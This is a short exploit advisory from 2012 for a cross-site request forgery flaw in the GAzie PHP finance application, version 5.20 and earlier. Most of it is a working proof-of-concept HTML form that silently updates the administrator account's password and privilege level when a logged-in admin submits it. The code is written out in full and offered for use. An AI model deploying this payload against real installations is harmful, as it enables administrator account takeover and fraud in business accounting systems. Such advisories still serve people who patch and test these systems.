GAzie <= 5.20 Cross Site Request Forgery

======================================== GAzie &#60;= 5.20 Cross Site Request Forgery ======================================== Author___: giudinvx Email____: &#60;giudinvx[at]gmail[dot]com&#62; Date_____: 5/02/2012 Site_____: http://www.giudinvx.altervista.org/ -------------------------------------------------------- @Application Info: Multicompany finance application written in PHP using a MySql database backend for small to medium enterprise. It lets you write invoices, manage stock, manage orders , accounting, etc. Send tax receipt to electronic cash register. @Version 5.20http://sourceforge.net/projects/gazie/ -------------------------------------------------------- ==============[[ -Exploit Code- ]]============== &#60;form enctype=&#34;multipart/form-data&#34; action=&#34;[localhost]/modules/config/admin_utente.php?Login=amministratore&Update&#34; method=&#34;POST&#34;&#62; &#60;input type=&#34;hidden&#34; name=&#34;Login&#34; value=&#34;amministratore&#34;&#62; &#60;input type=&#34;hidden&#34; value=&#34;&#34; name=&#34;Update&#34;&#62; &#60;input type=&#34;text&#34; value=&#34;Surname &#34; name=&#34;Cognome&#34; title=&#34;Cognome&#34;&#62; &#60;input type=&#34;text&#34; value=&#34;Name &#34; name=&#34;Nome&#34; title=&#34;Nome&#34;&#62; &#60;input type=&#34;text&#34; value=&#34;italian&#34; name=&#34;lang&#34;&#62; &#60;input type=&#34;text&#34; value=&#34;9&#34; name=&#34;Abilit&#34;&#62;&#60;br/&#62; Password &#60;input type=&#34;password&#34; value=&#34;&#34; name=&#34;Password&#34;&#62;&#60;br/&#62;&#60;!-- at least eight alphanumeric characters --&#62; Repeat password &#60;input type=&#34;password&#34; value=&#34;&#34; name=&#34;confpass&#34;&#62;&#60;br/&#62; &#60;input type=&#34;submit&#34; value=&#34;START THE GAME&#34; name=&#34;Submit&#34;&#62; &#60;/form&#62;